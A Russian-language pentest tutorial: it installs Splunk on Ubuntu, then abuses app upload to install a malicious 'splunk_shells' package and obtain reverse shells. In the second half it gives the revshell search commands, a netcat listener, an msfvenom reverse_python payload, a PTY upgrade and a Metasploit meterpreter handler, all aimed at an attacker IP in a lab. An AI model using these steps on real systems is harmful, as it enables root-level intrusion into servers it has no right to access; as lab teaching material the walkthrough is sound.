В этой статье пойдет речь об использовании SPLUNK для получения бэкконнектов. Этот способ популярен в пентестинге среды SPLUNK и соответствующей IТ-инфраструктуры.
Содержание
- Знакомство с SPLUNK
- Внедрение SPLUNK на Ubuntu
- Использование SPLUNK для получения бэкконнектов
Что такое SPLUNK?
Splunk Enterprise Security (ES) — информационная система управления безопасностью (SIEM), которая обеспечивает понимание машинных данных, генерируемых с помощью сети, конечного устройства, вредоносной программы для выявления уязвимости и идентификации информации. Это премиум-приложение, которое проходит лицензирование отдельно от компании Splunk.
Этот продукт захватывает, индексирует и коррелирует данные в реальном времени в хранилище с возможностью их поиска, из которого он может генерировать графики, отчеты, оповещения, панели инструментов и другие наглядные средства.
Подробнее об этом можно прочитать, перейдя по ссылке.
Внедрение SPLUNK на Ubuntu
Будет произведен пентестинг SPLUNK на платформе Linux (здесь используется Ubuntu), хотя его также можно выполнить и для Windows.
Нужно перейти по ссылке https://www.splunk.com и зарегистрироваться там для загрузки бесплатной пробной версии SPLUNK. Поскольку пользователь будет продолжать работу с Ubuntu, уже был загружен SPLUNK для Linux 64 bit (файл .tgz).
После следует выполнить описанный ниже процесс для запуска программы SPLUNK. Пользователь открывает терминал, переходит в раздел Загрузки и извлекает файл с помощью:
tar -zxfv splunk-7.3.0-657388c7a488-Linux-x86_64.tgz
Далее он выполняет следующие команды для установки:
mv splunk /opt
cd /opt
cd splunk
cd bin/
/opt/splunk/bin/splunk start --accept-license
Тогда его попросят ввести имя и пароль, которые будут нужны для настройки SPLUNK.
После этого пользователь увидит следующий экран с URL-адресом графического интерфейса SPLUNK.
Пользователь переходит по адресу http://ubuntu:8000 (URL-адрес интерфейса SPLUNK) и вводит его имя и пароль, которые были выбраны ранее:
Использование SPLUNK для получения бэкконнектов
На первом этапе было подробно описано, как можно развернуть SPLUNK на локальной машине (Ubuntu). Теперь стоит перейти к пентестингу SPLUNK, где пользователь будет пытаться применить его для получения бэкконнектов.
Для использования SPLUNK сперва нужно загрузить последний шелл по ссылке:
https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz
Теперь пользователь входит в SPLUNK GUI со своей Kali, перейдя по IP-адресу сервера Ubuntu: 8000 (192.168.0.37:8000).
Переходит в раздел «App: Search & Reporting» и нажимает на кнопку «Search & Reporting».
Далее выбирает вариант «Install app from file».
Для установки какого-либо приложения SPLUNK дает возможность воспользоваться любыми форматами (.spl или .tar.gz). Пользуясь преимуществами функциональности программы, пользователь пытается загрузить шелл SPLUNK, который уже был скачан заранее.
После загрузки следует перезагрузить свой SPLUNK.
После перезагрузки нужно снова перейти на вкладку приложения и найти установленный архив (weaponize Splunk for red teaming and pen testing).
Пользователь прокручивает вниз, чтобы найти файл шелл, как показано ниже. Прежде чем он сможет запустить его, нужно нажать на кнопку «Permissions», чтобы изменить его разрешения.
Следует нажать на разрешения и применить это ко всем приложениям, как показано ниже на картинке.
Теперь нужно выполнить шелл. Пользователь переходит к опции поиска в SPLUNK и вводит команду, определяющую, что он хочет, чтобы бэкконнекты стандартного типа связались с Out attach machines IP по порту.
| revshell std 192.168.0.7 1234
После этого пользователь возвращается в Kali Linux и открывает терминал.
Он запускает netcat с помощью следующей команды на любом желаемом порту (здесь был использовал 1234):
nc -lvp 1234
Как можно заметить, выполняя команду id, пользователю показывается корневая информация uid и gid, но для получения верной оболочки tty необходимо выбраться из этого заключения.
Используется Msfvenom для создания полезной нагрузки python.
msfvenom -p cmd/unix/reverse_python lhost=192.168.0.7 lport=4444 R
Полезная нагрузка загружается через существующий сеанс Netcat. Все, что нужно сделать, это вставить ее в терминал и запустить, но не стоит забывать запустить netcat внутри нового терминала.
Новый сеанс Netcat запускается на порту (4444), который пользователь определил в его полезной нагрузке, и видно, что выполнение процесса происходит безупречно. После запуска этого сеанса следует выполнить следующую команду:
python –c 'import pty;pty.spawn("/bin/bash")'
В конце концов, шелл получен.
Сессия Meterpreter
Если пользователь надеется на сеанс meterpreter, то он может использовать мульти-обработчик для получения обратного соединения машины жертвы.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.0.7
msf exploit(multi/handler) > set lport 9999
msf exploit(multi/handler) > exploit-j
После выполнения обратной оболочки:
| revshell msf 192.168.0.7 9999
Ура! Сеанс запущен.
Таким образом, произведен пентестинг SPLUNK.
Автор переведённой статьи: Shivendu Vikram
